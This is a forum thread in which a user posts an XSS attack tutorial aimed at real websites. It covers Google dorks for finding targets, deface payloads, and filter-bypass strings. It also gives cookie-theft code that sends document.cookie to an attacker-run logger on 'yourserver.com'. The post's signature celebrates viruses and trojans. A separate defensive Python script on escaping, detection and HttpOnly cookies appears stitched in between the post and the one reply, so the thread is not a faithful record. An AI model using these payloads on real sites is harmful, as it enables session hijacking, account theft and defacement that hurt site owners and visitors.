  1. #1
    Mr Bomb (Join Date: Jun 2017, Location: Pakistan, Posts: 492)

    A complete tutorial on XSS (cross site scripting)

    Table Of Contents

    What is XSS?
    Finding XSS Vulnerabilities
    The Basics On XSS
    Deface Methods
    Cookie Stealing
    Filtration Bypassing
    ___________________
    What is XSS?
    'XSS' also known as 'CSS' (Cross Site Scripting, easily confused with 'Cascading Style Sheets')
    is a very common vulnerability found in Web Applications. 'XSS' allows the attacker to INSERT
    malicious code. There are many types of XSS but I will only explain 3 of them, and they are the most important:
    1- 'URL XSS': this means that the XSS won't stay on the page; it will only get executed if you have the malicious code in the URL and submit the URL.

    2- Input fields: wherever you can insert data, it is very common to be XSS vulnerable. For example, say we found a site with a search engine. Now in the search box you enter 'hacker' and hit enter; when the page loads, if it says your data like 'Found 100 Results For hacker', OK, now you see it's displaying our data on the page. Now what if we can execute code? There is no possible way to execute PHP code in this attack, but there certainly is for HTML and Javascript, but be aware of this method.

    3- In the third one you will be able to INSERT data (code) and it will stay on the website. Now there are 2 kinds; it depends if we can execute PHP or HTML. If we can inject PHP then we can also inject HTML, but NOT vice versa. OK, this kind of attack is normally found on Blogs, Shoutboxes, Profiles, Forums, just most places where you insert data and it stays there. Now HTML is totally different than PHP. HTML downloads to your PC and then your 'Browser' parses/interprets the code (that's why its source is viewable). With PHP the code is interpreted on the server the script is hosted on, then the data is returned to the browser. PHP injection is rare, but it doesn't harm to try. Note: PHP code can't be injected into an HTML page!

    Finding XSS Vulnerabilities
    Well, to start finding these vulnerabilities you can start checking out
    Blogs, Forums, Shoutboxes, Comment Boxes, Search Boxes and many things.

    Using 'Google Dorks' makes the finding easier. OK, if you wanna get cracking, go to Google.com and type
    inurl:"search.php?q=" now that is a common page and has a lot of results. Now let's move on to the next part.

    The Basics On XSS

    To know the basics this picture may help you

    The most used XSS injection is

    <script>alert("XSS")</script>

    This will alert a popup saying XSS if the site is vulnerable, and this is easily editable, meaning you can also inject
    <script>alert("your name or message")</script>
    So going back, I told you a Google dork, search.php?q=
    Well, we will use this to check for vulnerabilities.

    To check if it is vulnerable we type

    www.site.com/search.php?q=<script>alert("your name or message")</script>


    This then gives a popup like this (screenshot: http://1.bp.blogspot.com/-bgBRn_F6n4A/TVtlYG6p_4I/AAAAAAAAAKM/nDbFCjwoDKk/s1600/Untitled-1.jpg)

    Many times this works, but if it does not work don't cry, we have another way.. :P

    You can try injecting HTML ;)

    You can put these two strings to inject HTML

    <h1>anything you want</h1>
    <br><br><b><u>any thing you want</u></b>

    so our URL will be

    www.site.com/search.php?q=<h1>anything you want</h1>
    or
    www.site.com/search.php?q=<br><br><b><u>any thing you want</u></b>
    If you see the bold text on the page and newlines then you know it's vuln.

    Example (image not reproduced)

    Deface Methods
    Well, now you understand how XSS works, we can explain some simple XSS deface methods. There
    are many ways for defacing; I will mention some of the best and the ones I used most.

    <html><body><IMG SRC="http://site.com/yourDefaceIMAGE.png"></body></html>

    The first one being IMG SRC. Now for those of you who don't know HTML, IMG SRC is a tag that
    displays the IMAGE linked to it on the webpage.

    OK, now if you change the link to a valid picture link, and save it and run it, you will see your deface page.

    Let us say we have found a Shoutbox, Comment box, or anything that shows your data after you submitted it; you could insert the following to make the picture display on the page.

    OK, it helps to make your picture big so it stands out and it's clear the site got hacked.

    Another method is using FLASH videos; it's the same as the method below but a little more stylish deface.

    <EMBED SRC="http://site.com/xss.swf">

    That will execute the flash video linked to it.

    Now a popup or a redirection

    <script>window.open( "http://hacking-class.blogspot.com" )</script>

    Cookie Stealing

    This is the best thing about XSS..

    First get yourself a cookie stealer from here

    OK, now you have it, save it as a .php file and upload it to your server. Remember to create the file 'log.txt' too
    and chmod it to 777. OK, now find an XSS vulnerable website; any attack type will do.

    OK, now you're gonna want to insert this code.

    window.location = "http://yourserver.com/cookielogger.php?c="+document.cookie

    or

    document.location = "http://yourserver.com/cookielogger.php?c="+document.cookie
    Now when a user visits the page that got injected to, they will be sent to the site, and the cookie will be stolen.
    The second one is more stealthy.

    Now it is the time to hijack the cookies



    Filtration Bypassing

    A lot of sites may seem vulnerable but not execute the code.. This will help you.

    Some common methods to bypass filtration are

    ')alert('xss');

    or

    ");alert('xss');

    That will do the same thing as <script>alert("XSS")</script> on a vulnerable server.

    You can also try hexing or base64 encoding your data before you submit.

    Please note it's bad practice to use alert("XSS") to test for XSS, as I've known sites block the keyword XSS
    before.

    Some other ways to bypass filtration

    <script type=text/javascript>alert("saurav")</script>
    <script>alert("saurav")</script>;
    <script>alert("saurav");</script>
    <script>alert("/saurav"/)</script>

    Hope that helped you
    More info Contact:
    Skype:bombproductions
    ICQ #:623378515
    ICQ#:911299

    I Love virus programming!
    I Love Batch coding!
    I Love Virus!
    I Love Batch!
    I Love Worm programming!
    I Love Worm!
    I Love Trojan!
    FUCK THE SYSTEM!
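The three behaviours the post above relies on (a search page that echoes the q parameter straight back into HTML, a keyword filter that only blocks "xss" and the literal "<script>" tag, and a session cookie readable through document.cookie) are easiest to reason about from the defender's side. The following Python script is an added example and is not code from the post or from any site it names; the function names (render_results_unsafe, render_results_safe, blacklist_blocks, reflects_raw_markup, suspicious_search_request, session_cookie_header) are hypothetical, and the sample inputs are constructed from the strings the post quotes. It shows why the blacklist lets the post's "bypass" strings through while context-aware HTML encoding neutralises all of them, how a log-side check can flag such requests, and which cookie attribute stops document.cookie from exposing the session.

```python
import html
from urllib.parse import urlsplit, parse_qs

# Constructed sample inputs, modelled on the strings quoted in the post above.
SAMPLE_INPUTS = [
    'hacker',
    '<script>alert("XSS")</script>',
    '<script type=text/javascript>alert("saurav")</script>',
    '<h1>anything you want</h1>',
    '<IMG SRC="http://site.com/yourDefaceIMAGE.png">',
]

PREFIX = "<p>Found 100 Results For "
SUFFIX = "</p>"


def render_results_unsafe(q: str) -> str:
    """The vulnerable pattern: user input concatenated straight into HTML."""
    return f"{PREFIX}{q}{SUFFIX}"


def render_results_safe(q: str) -> str:
    """The fix: encode for the HTML text context before reflecting."""
    return f"{PREFIX}{html.escape(q, quote=True)}{SUFFIX}"


def blacklist_blocks(q: str) -> bool:
    """A keyword blacklist of the kind the post describes (blocks 'xss' and the
    literal '<script>' tag).  Hypothetical; kept only to show it is insufficient."""
    lowered = q.lower()
    return "xss" in lowered or "<script>" in lowered


def reflected_part(rendered: str) -> str:
    """Return just the portion of the rendered page that came from the query."""
    assert rendered.startswith(PREFIX) and rendered.endswith(SUFFIX)
    return rendered[len(PREFIX):-len(SUFFIX)]


def reflects_raw_markup(q: str, renderer) -> bool:
    """True if the renderer lets '<' or '>' from the input reach the page unencoded."""
    part = reflected_part(renderer(q))
    return "<" in part or ">" in part


def suspicious_search_request(url: str, param: str = "q") -> bool:
    """Detection helper for proxy/web logs: flag a search request whose decoded
    parameter carries HTML metacharacters.  parse_qs percent-decodes, so
    '%3Cscript%3E' and '<script>' are treated the same."""
    values = parse_qs(urlsplit(url).query, keep_blank_values=True).get(param, [])
    return any(any(ch in v for ch in '<>"\'') for v in values)


def session_cookie_header(value: str) -> str:
    """Set-Cookie value that keeps document.cookie from exposing the session:
    HttpOnly hides it from script, Secure restricts it to TLS, SameSite=Lax
    limits cross-site sending."""
    return f"session={value}; Path=/; HttpOnly; Secure; SameSite=Lax"


if __name__ == "__main__":
    for q in SAMPLE_INPUTS:
        print(f"{q!r:60} blacklist_blocks={blacklist_blocks(q)!s:5} "
              f"raw_unsafe={reflects_raw_markup(q, render_results_unsafe)!s:5} "
              f"raw_safe={reflects_raw_markup(q, render_results_safe)}")
```

Running the script shows the pattern the post exploits: the blacklist stops only `<script>alert("XSS")</script>`, while `<script type=text/javascript>...`, the `<h1>` string and the `<IMG SRC=...>` deface string all pass it and are reflected raw by the unsafe renderer. The safe renderer reflects none of them as markup, because the fix is encoding output for the context it lands in, not guessing which keywords are dangerous.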

  2. #2
    Senior Member (Join Date: Aug 2017, Posts: 12)
    thanks